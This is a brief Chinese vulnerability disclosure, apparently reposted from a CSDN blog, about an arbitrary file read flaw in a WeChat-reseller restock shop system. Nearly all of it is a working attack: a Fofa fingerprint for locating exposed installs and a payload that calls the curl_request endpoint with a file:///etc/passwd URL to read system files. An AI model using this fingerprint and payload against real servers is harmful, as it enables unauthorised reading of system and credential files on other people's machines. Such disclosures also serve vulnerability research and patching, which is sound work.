自学内容网 自学内容网

某微商代理商补货商城系统存在任意文件读取漏洞

Fofa指纹:

"/template/mobile/new/static/assets/js/comm.js"

 

前台任意文件读取 

Payload:

/Mobile/address/curl_request?url=file:///etc/passwd

 

 


原文地址:https://blog.csdn.net/weixin_45790890/article/details/142683638

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!